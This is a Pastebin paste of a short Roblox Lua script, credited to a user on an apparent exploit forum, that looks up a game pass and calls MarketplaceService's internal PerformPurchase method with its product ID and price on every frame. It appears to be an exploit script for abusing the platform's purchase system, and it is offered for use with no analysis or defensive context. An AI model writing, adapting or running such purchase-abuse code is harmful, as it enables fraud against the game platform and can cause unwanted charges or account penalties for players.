Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ---CREATED BY Samantha ON VERM SO GO VOUCH: https://v3rmillion.net/showthread.php?tid=805671
- gamePassId = 6028667
- market = game:GetService("MarketplaceService")
- http = game:GetService("HttpService")
- info = market:GetProductInfo(gamePassId, Enum.InfoType.GamePass)
- game:GetService("RunService").Stepped:connect(function()
- market:PerformPurchase(Enum.InfoType.Asset, info["ProductId"], info["PriceInRobux"], http:GenerateGUID(false))
- end)
Add Comment
Please, Sign In to add comment